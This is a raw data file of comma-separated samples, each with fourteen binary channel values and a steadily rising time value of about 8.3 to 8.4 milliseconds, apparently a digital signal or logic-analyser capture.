0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1855240e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,8.3102880e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,8.3105160e-03 1,1,1,1,0,1,0,0,0,1,0,1,0,1,8.3105480e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,8.3105720e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,1,8.3108880e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,8.3109160e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,8.3109200e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,8.3109400e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,8.3109640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,8.3109880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,8.3110120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,8.3110360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,8.3110640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,8.3110880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3111160e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3111400e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3111640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3111880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3112120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3112360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3112640e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3112680e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3112880e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3113160e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3113200e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3113400e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3113640e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3113680e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3114120e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3114360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3114440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3114640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3114880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3115160e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3115400e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3115640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3115880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3116120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3116360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3116840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3117080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3117640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3117880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3118360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3118600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3119120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3119360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3119640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3119880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3120120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3120360e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3120400e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3120840e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3121120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3121160e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3121360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3121600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3122120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3122360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3122840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3123120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3123640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3123880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3124120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3124360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3124600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3124840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3125360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3125600e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3125640e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3126120e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3126360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3126440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3126840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3127080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3127560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3127840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3128080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3128360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3128600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3128840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3129080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3129360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3129560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3129840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3130080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3130360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3130600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3130840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3131360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3131560e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3131640e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3131840e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3132080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3132160e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3132360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3132600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3132840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3133080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3133600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3133840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3134080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3134360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3134840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3135080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3135560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3135880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3136360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3136600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3136840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3137080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3137360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3137560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3137840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3138080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3138360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3138600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3138840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3139080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3139360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3139560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3139840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3140080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3140360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3140600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3140840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3141080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3141360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3141560e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3141640e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3141840e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3142080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3142160e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3142360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3142600e-03 1,1,1,1,0,0,0,0,0,1,0,0,0,0,8.3142640e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3142680e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3143080e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3143360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3143400e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3143600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3143840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3144120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3144360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3144600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3144840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3145080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3145360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3145880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3146120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3146600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3146840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3147360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3147640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3148120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3148360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3148600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3148840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3149080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3149360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3149880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3150120e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3150160e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,8.3150600e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3150840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3150920e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3151360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3151640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3152120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3152360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3152600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3152840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3153080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3153360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3153640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3153880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3154120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3154360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3154600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3154840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3155120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3155360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3155600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3155880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3156120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3156360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3156600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3156840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3157080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3157360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3157600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3157880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3158360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3158600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3159120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3159360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3159880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3160120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3160600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3160840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3161120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3161360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3161600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3161880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3162120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3162360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3162840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3163120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3163640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3163880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3164360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3164600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3165120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3165360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3165640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3165880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3166120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3166360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3166600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3166840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3167080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3167360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3167600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3167880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3168120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3168360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3168600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3168840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3169080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3169360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3169600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3169880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3170120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3170360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3170600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3170840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3171080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3171360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3171600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3171880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3172120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3172360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3172600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3172840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3173080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3173360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3173600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3173880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3174120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3174360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3174600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3174840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3175080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3175360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3175600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3175880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3176120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3176360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3176600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3176840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3177080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3177360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3177600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3177880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3178120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3178360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3178600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3178840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3179120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3179360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3179600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3179880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3180120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3180360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3180600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3180840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,8.3181080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,8.3181360e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,8.3181400e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,8.4421920e-03 0,0,0,0,0,1,0,0,0,1,0,0,0,1,8.4423960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,8.4424200e-03 0,0,0,0,1,1,0,0,0,1,0,1,0,1,8.4424520e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,8.4424760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,1,8.4427960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,8.4428200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,8.4428280e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,8.4428440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,8.4428720e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,8.4428960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,8.4429240e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,8.4429480e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,8.4429720e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,8.4429960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,8.4430200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4430240e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4430440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4430680e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4430960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4431200e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4431480e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4431720e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4431960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4432200e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4432440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4432720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4432760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4433240e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4433480e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4433560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4433720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4433960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4434200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4434440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4434720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4434960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4435480e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4435720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4435760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4435960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4436200e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4436440e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4436720e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4436960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4437240e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4437480e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4437720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4437800e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4438200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4438440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4438720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4438960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4439000e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4439480e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4439720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4439800e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4440200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4440440e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4440520e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4440720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4440960e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4441240e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4441480e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4441720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4441960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4442040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4442440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4442720e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4442960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4443240e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4443480e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4443720e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4444200e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4444440e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4444720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4444960e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4445240e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4445480e-03 0,0,0,0,1,1,0,0,0,0,0,0,0,0,8.4445520e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4445560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4445720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4445960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4446200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4446440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4446720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4446960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4447240e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4447480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4447720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4447960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4448440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4448720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4448760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4449240e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4449480e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4449560e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4449960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4450200e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4450440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4450720e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4450960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4451240e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4451720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4451960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4452040e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4452440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4452720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4452760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4452960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4453160e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4453480e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4453720e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4453960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4454200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4454280e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4454720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4454920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4455200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4455440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4455720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4455960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4456200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4456440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4456680e-03 